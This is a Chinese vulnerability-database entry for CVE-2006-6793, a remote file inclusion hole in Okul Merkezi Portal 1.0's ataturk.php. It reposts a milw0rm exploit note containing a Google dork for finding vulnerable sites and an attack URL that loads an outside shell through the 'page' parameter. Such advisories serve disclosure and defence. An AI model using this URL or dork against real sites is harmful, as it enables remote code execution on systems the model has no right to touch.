Okul Merkezi Portal 'ataturk.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111855 漏洞类型 输入验证
发布时间 2006-12-25 更新时间 2007-01-02
CVE编号 CVE-2006-6793 CNNVD-ID CNNVD-200612-572
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3012
https://cxsecurity.com/issue/WLB-2006120137
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-572
|漏洞详情
OkulMerkeziPortal1.0的ataturk.php中存在PHP远程文件包含漏洞,远程攻击者可以通过page参数中的URL执行任意PHP代码。
|漏洞EXP
# LiderHack.Org & BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : Okul Merkezi Portal v1.0

# GoogLe Dork : ogrencimezunlar.php

# Script Download : http://www.okulmerkezi.com/omdemo/

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |

# Vulnerable file : ataturk.php

#Vuln :
http://www.victim.com/ScriptPath/ataturk.php?page=[sheLL]

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

# milw0rm.com [2006-12-25]
|参考资料

来源:BID
名称:21730
链接:http://www.securityfocus.com/bid/21730
来源:BUGTRAQ
名称:20061224OkulMerkeziPortalv1.0RemoteFileIncLudeVuln.
链接:http://www.securityfocus.com/archive/1/archive/1/455259/100/0/threaded
来源:VUPEN
名称:ADV-2006-5189
链接:http://www.frsirt.com/english/advisories/2006/5189
来源:SREASON
名称:2069
链接:http://securityreason.com/securityalert/2069